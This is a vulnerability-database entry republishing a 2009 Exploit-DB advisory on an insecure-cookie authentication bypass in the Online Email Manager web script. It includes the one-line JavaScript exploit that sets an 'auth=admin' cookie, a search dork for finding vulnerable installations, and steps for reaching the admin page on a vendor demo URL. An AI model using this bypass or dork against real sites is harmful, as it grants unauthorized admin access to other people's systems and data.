Online Email Manager Insecure Cookie Handling Vulnerability

vendor:

Online Email Manager

by:

Hussin X

8,8

CVSS

HIGH

Insecure Cookie Handling

613

CWE

Product Name: Online Email Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Online Email Manager Insecure Cookie Handling Vulnerability

A vulnerability in Online Email Manager allows an attacker to gain access to the admin page by setting the auth cookie to admin. This can be done by using the javascript command document.cookie = "auth=admin; path=/". The attacker can then access the emailList.php page and gain access to the admin page.

Mitigation:

Ensure that cookies are properly validated and that the application is not vulnerable to cookie manipulation.

Source

Exploit-DB raw data:

Online Email Manager Insecure Cookie Handling Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_email_manager.phps
 
DorK   : Powered by Online Email Manager



exploit:

javascript:document.cookie = "auth=admin; path=/";



exploit for demo

|# http://www.esoftpro.com/demo/OEM/admin/index.php

|ex   javascript:document.cookie = "auth=admin; path=/";

|#  go to url "emailList.php"

|#  http://www.esoftpro.com/demo/OEM/admin/emailList.php

|# you login in to admin page :d






Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

# milw0rm.com [2009-04-17]